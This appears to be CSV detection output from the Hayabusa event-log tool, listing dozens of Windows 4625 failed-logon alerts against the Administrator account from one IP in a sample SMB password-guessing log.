2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
